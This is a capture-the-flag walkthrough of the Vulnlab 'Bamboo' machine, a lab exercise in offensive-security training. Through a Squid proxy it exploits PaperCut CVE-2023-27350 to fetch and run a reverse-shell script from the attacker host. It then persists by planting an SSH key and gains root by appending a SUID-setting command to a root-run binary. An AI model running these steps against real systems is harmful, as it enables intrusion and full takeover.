vulnlab bamboo
nmap scan
# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83 Nmap scan report for bamboo.vl (10.10.79.83) Host is up (0.020s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http # Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds
┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan] └─$ ./squidscan Port 22 found! 8916 / 65535 [------->____________________________________________] 13.60% 1659 p/sPort 9192 found! Port 9195 found! Port 9173 found! Port 9174 found! 9707 / 65535 [------->____________________________________________] 14.81% 1678 p/sPort 9191 found! 65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s
modified /etc/proxychains
[ProxyList] # add proxy here ... # meanwile # defaults set to "tor" #socks4 127.0.0.1 9050 #socks5 127.0.0.1 1080 http 10.10.79.83 3128
.
┌──(puck㉿kali)-[~/vulnlab/bamboo] └─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv * Trying 10.10.79.83:3128... * Connected to 10.10.79.83 (10.10.79.83) port 3128 > GET http://10.10.79.83:9191/ HTTP/1.1 > Host: 10.10.79.83:9191 > User-Agent: curl/8.8.0 > Accept: */* > Proxy-Connection: Keep-Alive > * Request completely sent off < HTTP/1.1 302 Found < Date: Wed, 31 Jul 2024 06:40:17 GMT < Location: http://10.10.79.83:9191/user < Content-Length: 0 < X-Cache: MISS from bamboo < X-Cache-Lookup: MISS from bamboo:3128 < Via: 1.1 bamboo (squid/5.2) < Connection: keep-alive < * Connection #0 to host 10.10.79.83 left intact
Exploiting CVE-2023-27350
wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py
1st
┌──(puck㉿kali)-[~/vulnlab/bamboo] └─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh" [*] Papercut instance is vulnerable! Obtained valid JSESSIONID [*] Updating print-and-device.script.enabled to Y [*] Updating print.script.sandboxed to N [*] Prepparing to execute... [+] Executed successfully! [*] Updating print-and-device.script.enabled to N [*] Updating print.script.sandboxed to Y
2nd
┌──(puck㉿kali)-[~/vulnlab/bamboo] └─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" [*] Papercut instance is vulnerable! Obtained valid JSESSIONID [*] Updating print-and-device.script.enabled to Y [*] Updating print.script.sandboxed to N [*] Prepparing to execute... [+] Executed successfully! [*] Updating print-and-device.script.enabled to N [*] Updating print.script.sandboxed to Y
s.sh contains:
#!/bin/bash sh -i >& /dev/tcp/10.8.2.138/9001 0>&1
catch the shell
┌──(puck㉿kali)-[~/vulnlab/bamboo] └─$ rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168 sh: 0: can't access tty; job control turned off $ id uid=1001(papercut) gid=1001(papercut) groups=1001(papercut) $ hostname bamboo $ python3 -c 'import pty;pty.spawn("/bin/bash")' papercut@bamboo:~/server$ export TERM=xterm export TERM=xterm papercut@bamboo:~/server$ zsh: suspended rlwrap nc -nlvp 9001 ┌──(puck㉿kali)-[~/vulnlab/bamboo] └─$ stty raw -echo;fg [1] + continued rlwrap nc -nlvp 9001 papercut@bamboo:~/server$ ls ls bin deployment lib reports server.uuid custom event-store lib-ext server.properties tmp data examples logs server.properties.template version.txt papercut@bamboo:~/server$
Let’s add our key to the authorized_keys file, to get a SSH shell
papercut@bamboo:~$ mkdir .ssh papercut@bamboo:~$ cd .ssh papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys papercut@bamboo:~/.ssh$
we now do linpeas and pspy stuff on bamboo
ssh -i papercut papercut@10.10.79.83
privesc
There is an authentication bypass script in exploitdb https://www.exploit-db.com/exploits/51391 which is the same CVE as the one we started
We run it as follows and it will output what we need to do.
➜ bamboo python3 auth_bypass.py Enter the ip address: 127.0.0.1 Version: 22.0.6 Vulnerable version Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard
The PaperCut NG instance running on port 9191 so let’s forward that port via SSH
papercut papercut@10.10.29.83 -L 9191:127.0.0.1:9191 -N
Browse to papercut
Click refresh servers to trigger the server-command
.
papercut@bamboo:~$ pwd pwd /home/papercut papercut@bamboo:~$ cat user.txt cat user.txt VL{fb<redacted>c3} papercut@bamboo:~$ papercut@bamboo:~/server/bin/linux-x64$ ls ls app-monitor pc-pdl-to-image app-monitor.conf pc-split-scan app-server pc-udp-redirect authpam roottasks authsamba sambauserdir create-client-config-file server-command create-ssl-keystore setperms db-tools start-server direct-print-monitor-config-initializer stduserdir gather-ldap-settings stop-server lib upgrade-server-configuration papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command echo 'chmod u+s /bin/bash' >> server-command papercut@bamboo:~/server/bin/linux-x64$ papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash ls -la /bin/bash -rwsr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash papercut@bamboo:~/server/bin/linux-x64$ bash -p bash -p bash-5.1# cd /rocd /root cd /root bash-5.1# ls ls ls root.txt snap bash-5.1# cat rocat root.txt cat root.txt VL{48<redacted>26} bash-5.1#
That’s all.